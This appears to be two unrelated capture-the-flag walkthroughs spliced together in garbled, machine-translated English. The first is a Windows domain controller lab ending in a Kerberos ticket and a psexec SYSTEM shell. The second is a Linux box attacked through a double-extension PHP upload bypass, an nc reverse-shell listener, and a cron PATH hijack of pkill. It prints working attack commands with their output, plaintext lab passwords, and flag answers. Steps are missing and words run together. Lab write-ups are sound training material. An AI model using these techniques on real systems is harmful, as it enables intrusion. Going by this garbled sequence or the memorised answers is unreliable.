$ nmap -Pn -sCV -A -T4 -p- -oN nmap_result 10.10.11.174
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-09 13:31:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-09T13:32:36
|_ start_date: N/A
|_clock-skew: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
You now know the operational status of the port.
Now that I know the domain name, I will add it./etc/hosts
10.10.11.174 support.htb
I checked the DNS and found the subdomain, so I will add it to ./etc/hosts
$ dig @10.10.11.174 support.htb any
;; ANSWER SECTION:
support.htb. 600 IN A 10.10.11.174
support.htb. 3600 IN NS dc.support.htb.
support.htb. 3600 IN SOA dc.support.htb. hostmaster.support.htb. 107 900 600 86400 3600
Start with SMB enumeration.
I’ve found that enumerating share names.support-tools
$ smbclient -N -L 10.10.11.174
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
support-toolsWhen you go to the store, you will find multiple exe and zip files.
$ smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
UserInfo.exe.zipis suspicious, so I will download it.
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (48.3 KiloBytes/sec) (average 48.3 KiloBytes/sec)
When I unzipped it, I got an executable file called.UserInfo.exe
$ ls -la
total 944
drwxrwxr-x 2 kali kali 4096 Apr 12 11:44 .
drwxrwxr-x 3 kali kali 4096 Apr 12 11:43 ..
-rw-rw-rw- 1 kali kali 99840 Mar 1 2022 CommandLineParser.dll
-rw-rw-rw- 1 kali kali 22144 Oct 22 2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 kali kali 47216 Oct 22 2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 kali kali 84608 Oct 22 2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 kali kali 64112 Oct 22 2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 kali kali 20856 Feb 19 2020 System.Buffers.dll
-rw-rw-rw- 1 kali kali 141184 Feb 19 2020 System.Memory.dll
-rw-rw-rw- 1 kali kali 115856 May 15 2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 kali kali 18024 Oct 22 2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 kali kali 25984 Feb 19 2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 kali kali 12288 May 27 2022 UserInfo.exe
-rw-rw-rw- 1 kali kali 563 May 27 2022 UserInfo.exe.config
UserInfo.exeseems to be an executable file written in..NET
$ file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
UserInfo.ServicesI saw that it was connected to LDAP after execution.LdapQuerygetPassword()DirectoryEntry
getPassword()Let’s decrypt it.enc_password
Since LDAP communication is done in plain text, let’s capture the LDAP login process with Wireshark.
First, examine the commands in the executable file. It seems that the argument of , is required.finduser
$ mono UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
-v|--verbose Verbose output
Commands:
find Find a user
user Get information about a user
Looks like we need more options.-username
$ mono UserInfo.exe user
Unable to parse command 'user' reason: Required option '-username' not found!
Execution succeeded.
$ mono UserInfo.exe user -username hello -v
[*] Getting data for hello
[-] Exception: No Such Object
When I checked wireshark, I was able to capture LDAP authentication packets.
bindRequestWhen I checked the packet data, I was able to confirm a string that seemed to be a password. Since it is in the following packet, it seems that authentication is successful with this string.bindResponse success
When I checked the results, I found a password-like string in the item.info
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
(省略)
info: Ironside47pleasure40Watchful
5985Since the number port is open, the connection with WinRM was successful.
Decode the saved file and save it as .base64ticket.kirbi
$ base64 -d ticket.kirbi.b64 > ticket.kirbi
Finally, convert the ticket to a format that can be used by .impacket
$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
Use the ticket to make a shell connection. I was able to get the shell of the system account.psexec
$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mYVFUPYN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service Tztr on dc.support.htb.....
[*] Starting service Tztr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop\root.txtI was able to get the root flag from.
C:\Windows\system32> more C:\Users\Administrator\Desktop\root.txt
ba27ef32c706d15469541c11c323dd49
The original process seems to be a function to determine whether the file is a file and upload it to the file. In this case, the attacker would use a technique to bypass the extension determination by uploading a file such as the following: Since PHP is running on the server, it is likely that the attacker uploaded a PHP reverse shell file..pdf/cvs.pdf.php
It predicts what the attacker would have uploaded and scans the subordinates..pdf.php/cvs
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42840
ls
index.html
shell.pdf.php
/home/lachlan/user.txtYou can get the flag from:
/home/lachlan/user.txt
thm{af7e46b68081d4025c5ce10851430617}
A. thm{af7e46b68081d4025c5ce10851430617}
Q2. What is the proof.txt flag?
Hint. … and a bit sloppy in their automated kill scripts.
/home/lachlan/.bash_historyWhen you check the password, you will find that it is.lachlanthisistheway123
./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history
However, when I made an SSH connection, I was able to log in, but the connection was disconnected after a few seconds.
$ ssh lachlan@10.10.222.254
lachlan@10.10.222.254's password:
Last login: Thu May 5 04:39:19 2022 from 192.168.56.1
$ pwdnope
Connection to 10.10.222.254 closed.
/home/lachlan/.bash_historyIf you check the script that you found in , the process has been killed by the script./etc/cron.d/persistence
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
PATH=/home/lachlan/bin:/bin:/usr/binIf you look at the commands, you can see that they are referenced in order from the path, but they are not specified with an absolute path. If you create a file in , it will be executed./home/lachlan/binpkill/home/lachlan/binpkill/home/lachlan/bin/pkill
